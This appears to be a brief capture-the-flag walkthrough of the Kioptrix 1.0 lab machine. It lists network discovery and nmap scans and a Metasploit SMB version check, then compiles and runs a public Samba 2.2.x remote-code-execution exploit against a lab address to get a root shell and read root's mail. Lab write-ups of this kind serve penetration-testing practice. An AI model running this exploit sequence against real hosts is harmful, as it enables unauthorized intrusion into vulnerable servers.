root@blog:~#

Kioptrix1.0

RECON

Discovery

netdiscover -i eth1

192.168.57.1, 192.168.57.5 have open ports

Nmap Scan

nmap -sC -sV -A 192.168.57.5

-sC: script scan (default scripts), -sV: version detection, -A: OS detection
Port 139 running Samba

Version Scan

msfconsole
use auxiliary/scanner/smb/smb_version

Samba Version 2.2.1

Google-Fu

samba 2.2.1a exploit

2.2.8 RCE

ENUMERATION

Save Exploit

Make executable copy

gcc 10.c -o 10

gcc (the GNU compiler) compiles 10.c and writes the executable to the file named by -o (10)

Root Escalation

Shell

./10 -b 0 192.168.57.5

-b 0: brute force, Linux

Root Flag

head -n 100 /var/spool/mail/root